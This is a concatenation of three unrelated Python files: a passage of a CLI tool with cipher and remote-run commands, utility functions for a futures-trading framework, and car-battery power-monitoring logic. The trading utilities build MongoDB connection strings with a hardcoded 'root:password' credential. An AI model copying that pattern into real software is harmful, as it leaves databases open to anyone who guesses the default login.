def search_file(pattern, infile):
for line in infile:
match = pattern.search(line)
if match:
yield line
@dev.command()
@click.pass_context
@click.argument('mode', nargs=1, required=False, callback=alias_checker)
def ciphers(ctx, mode):
"""
Encrypts and decrypts texts in classical ciphers
"""
mode = get_arguments(ctx, 1)
if mode is None:
click.echo("No mode was passed.(choose encrypt or decrypt")
return
_mode = str(mode).lower()
cipher_dict = {
"Atbash": atbash.AtbashCipher,
"Caesar": caesar.CaesarCipher,
"ROT13": rot13.ROT13Cipher
}
for index, cipher in enumerate(cipher_dict):
print("{0}: {1}".format(index, cipher))
cipher_choice = int(click.prompt("Choose a cipher"))
if cipher_choice > len(cipher_dict) - 1 or cipher_choice < 0:
click.echo("Invalid cipher number was chosen.")
return
cipher = cipher_dict[list(cipher_dict.keys())[cipher_choice]]()
if _mode == "encrypt":
clear_text = click.prompt("The text you want to encrypt")
return click.echo(cipher.encrypt(clear_text))
elif _mode == "decrypt":
cipher_text = click.prompt("The text you want to decrypt")
return click.echo(cipher.decrypt(cipher_text))
else:
return click.echo("Invalid mode passed.")
@dev.command()
@click.pass_context
@click.argument("path", nargs=1, required=True)
def run(ctx, path):
"""
Compile and run code without a local compiler.
"""
if os.path.isfile(path):
source = open(path, "r").read()
file_extension = path.rsplit(".", 1)[1]
if file_extension not in supported_languages.keys():
click.echo(chalk.red("Sorry, Unsupported language."))
sys.exit(-1)
lang = supported_languages[file_extension]
compressed = 1
html = 0
params = RunAPIParameters(
client_secret=HACKEREARTH_API_KEY,
source=source,
lang=lang,
compressed=compressed,
html=html,
)
api = HackerEarthAPI(params)
click.echo(chalk.yellow("Compiling code.."))
r = api.compile()
click.echo(chalk.cyan("Running code..."))
r = api.run()
output = r.__dict__.get("output")
click.echo(chalk.green("Output:"))
click.echo(output)
click.echo("Link: " + r.__dict__.get("web_link"))
else:
click.echo(
chalk.red(
"No file such as "
+ path
+ ", Please re-check the file path and try again."
)
)
sys.exit(1)
|
vtFunction.py | # encoding: UTF-8
"""
包含一些开发中常用的函数
"""
import os
import decimal
import json
import datetime as dt
import time
from datetime import datetime,time
import threading
import multiprocessing.pool
import functools
from math import isnan
MAX_NUMBER = 10000000000000
MAX_DECIMAL = 4
#----------------------------------------------------------------------
def safeUnicode(value):
"""检查接口数据潜在的错误,保证转化为的字符串正确"""
# 检查是数字接近0时会出现的浮点数上限
if type(value) is int or type(value) is float:
if value > MAX_NUMBER or isnan(value):
value = 0
# 检查防止小数点位过多
if type(value) is float:
d = decimal.Decimal(str(value))
if abs(d.as_tuple().exponent) > MAX_DECIMAL:
value = round(value, ndigits=MAX_DECIMAL)
return unicode(value)
# 图标路径
iconPathDict = {}
path = os.path.abspath(os.path.dirname(__file__))
for root, subdirs, files in os.walk(path):
for fileName in files:
if '.ico' in fileName:
iconPathDict[fileName] = os.path.join(root, fileName)
#----------------------------------------------------------------------
def loadIconPath(iconName):
"""加载程序图标路径"""
global iconPathDict
return iconPathDict.get(iconName, '')
#----------------------------------------------------------------------
def getTempPath(name):
"""获取存放临时文件的路径"""
tempPath = os.path.join(os.getcwd(), 'temp')
if not os.path.exists(tempPath):
os.makedirs(tempPath)
path = os.path.join(tempPath, name)
return path
# JSON配置文件路径
jsonPathDict = {}
#----------------------------------------------------------------------
def getJsonPath(name, moduleFile):
"""
获取JSON配置文件的路径:
1. 优先从当前工作目录查找JSON文件
2. 若无法找到则前往模块所在目录查找
"""
currentFolder = os.getcwd()
currentJsonPath = os.path.join(currentFolder, name)
if os.path.isfile(currentJsonPath):
jsonPathDict[name] = currentJsonPath
return currentJsonPath
moduleFolder = os.path.abspath(os.path.dirname(moduleFile))
moduleJsonPath = os.path.join(moduleFolder, '.', name)
jsonPathDict[name] = moduleJsonPath
return moduleJsonPath
vtGlobalSetting = None
#----------------------------------------------------------------------
def loadMongoSetting():
"""载入MongoDB数据库的配置"""
global vtGlobalSetting
setting = vtGlobalSetting
if setting == None:
"""载入MongoDB数据库的配置"""
fileName = 'VT_setting.json'
filePath = getJsonPath(fileName,__file__)
f = open(filePath)
setting = json.load(f)
#检测可用性,起用mongoHost1
from pymongo.errors import ConnectionFailure
import pymongo
try:
uri = 'mongodb://root:password@' + setting['mongoHost'] + ':' + str(setting['mongoPort']) + '/?serverSelectionTimeoutMS=200'
client = pymongo.MongoClient(uri, connect=False)
client.admin.command('ismaster')
except ConnectionFailure:
setting['mongoHost'] = setting['mongoHost1']
print("Default Mongo server not available, use backup Server ")
vtGlobalSetting = setting
host = 'mongodb://root:password@' + setting['mongoHost']
port = setting['mongoPort']
logging = setting['mongoLogging']
return host, port, logging
#----------------------------------------------------------------------
def todayDate():
"""获取当前本机电脑时间的日期"""
return datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)
# from vnpy.trader.timeout_decorate import timeout
# def setInterval(interval):
# def decorator(function):
# def wrapper(*args, **kwargs):
# stopped = threading.Event()
# def loop(): # executed in another thread
# while not stopped.wait(interval): # until stopped
# #function(*args, **kwargs)
# try:
# timeout(interval,False)(function)(*args,**kwargs)
# except :
# pass
# else:
# pass
# t = threading.Thread(target=loop)
# t.daemon = True # stop if the program exits
# t.start()
# return stopped
# return wrapper
# return decorator
class RemoteSetting(object):
"""RPC服务引擎"""
settingFileName = 'RS_setting.json'
settingFilePath = getJsonPath(settingFileName, __file__)
name = u'RPC服务'
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
host,port,log = loadMongoSetting()
self.host = host[host.find('@')+1:]
if not self.host:
self.host = host
self.loadSetting()
#----------------------------------------------------------------------
def loadSetting(self):
"""读取配置"""
with open(self.settingFilePath) as f:
d = json.load(f)
self.repAddress = d['repAddress'].replace('*',self.host)
self.pubAddress = d['pubAddress'].replace('*',self.host)
#-------------------------------------------------------------------------------------------------------
#国内正规期货市场交易时间为周一至周五早上9点到11点半,下午1点半到15点结束。 早上10:15到10:30休息15分钟,夜盘:21点到日凌晨2:30分。
def isRecordingTime(dt, DAY_START = time(8, 30),DAY_END = time(15, 18),NIGHT_START = time(20, 30),NIGHT_END = time(2, 33)):
currentTime = dt.time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 过滤周末时间段
weekday = dt.isoweekday()
if ((weekday == 6 and currentTime > NIGHT_END) or weekday == 7):
recording = False
return recording
#-------------------------------------------------------------------------------------------------------
def isNotTradingTime(time,timeRanges=[
(datetime.strptime("02:30:00", "%H:%M:%S").time(), datetime.strptime("08:59:59", "%H:%M:%S").time()), #night rest
(datetime.strptime("10:15:00", "%H:%M:%S").time(), datetime.strptime("10:29:59", "%H:%M:%S").time()), #morning rest
(datetime.strptime("11:30:00", "%H:%M:%S").time(), datetime.strptime("13:29:59", "%H:%M:%S").time()), #day rest
(datetime.strptime("15:00:00", "%H:%M:%S").time(), datetime.strptime("20:59:59", "%H:%M:%S").time()), #afternoon rest
]):
for tr in timeRanges:
if tr[0] <= time <= tr[1]:
return True
return False
pass
def isTradingTime(time):
return not isNotTradingTime(time)
pass
# def isTradingTime(time,timeRanges=[
# (datetime.strptime("09:00:00", "%H:%M:%S").time(), datetime.strptime("10:15:00", "%H:%M:%S").time()),
# (datetime.strptime("10:30:00", "%H:%M:%S").time(), datetime.strptime("11:30:00", "%H:%M:%S").time()),
# (datetime.strptime("13:30:00", "%H:%M:%S").time(), datetime.strptime("15:00:00", "%H:%M:%S").time()),
# (datetime.strptime("21:00:00", "%H:%M:%S").time(), datetime.strptime("23:00:00", "%H:%M:%S").time())
# ]):
# for tr in timeRanges:
# # [)
# if tr[0] <= time < tr[1]:
# return True
# return False
# pass
#########################################################################
def timeit(method):
import time
def timed(*args, **kw):
ts = time.time()
result = method(*args, **kw)
te = time.time()
if 'log_time' in kw:
name = kw.get('log_name', method.__name__.upper())
kw['log_time'][name] = int((te - ts) * 1000)
else:
print ('%r %2.2f ms' % \
(method.__name__, (te - ts) * 1000))
return result
return timed |
power_monitoring.py | import random
import threading
import time
from statistics import mean
from typing import Optional
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
from selfdrive.statsd import statlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of peripheralState voltage
self.car_voltage_instant_mV = 12e3 # Last value of peripheralState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, peripheralState, ignition):
try:
now = sec_since_boot()
# If peripheralState is None, we're probably not in a car, so we don't care
if peripheralState is None or peripheralState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = peripheralState.voltage
self.car_voltage_mV = ((peripheralState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
statlog.gauge("car_voltage", self.car_voltage_mV / 1e3)
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if ignition:
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t: float, current_power: float) -> None:
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self) -> int:
return int(self.power_used_uWh)
def get_car_battery_capacity(self) -> int:
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, ignition: bool, in_car: bool, offroad_timestamp: Optional[float]) -> bool:
if offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= not ignition
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= in_car
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, peripheralState, ignition, in_car, offroad_timestamp, started_seen):
if offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(ignition, in_car, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.